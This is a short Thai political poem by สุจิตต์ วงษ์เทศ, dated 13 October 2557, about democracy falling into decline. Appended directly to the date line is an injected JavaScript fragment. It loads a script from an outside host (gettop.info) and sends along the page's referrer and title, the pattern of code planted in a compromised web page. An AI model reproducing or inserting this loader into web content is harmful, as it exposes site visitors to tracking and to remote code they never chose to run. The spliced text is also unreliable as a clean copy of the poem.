ลำเลิก

 

ไม่มีเรา เขาเจริญ

เพราะมีเราเขาเลยเดินถดถอยหลัง

ประชาธิปไตยต้องพ่ายพัง

ยิ่งลำเลิกระวังทั้งโลกย้อน

 

 สุจิตต์ วงษ์เทศ

จันทร์ 13 ตุลาคม 2557s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;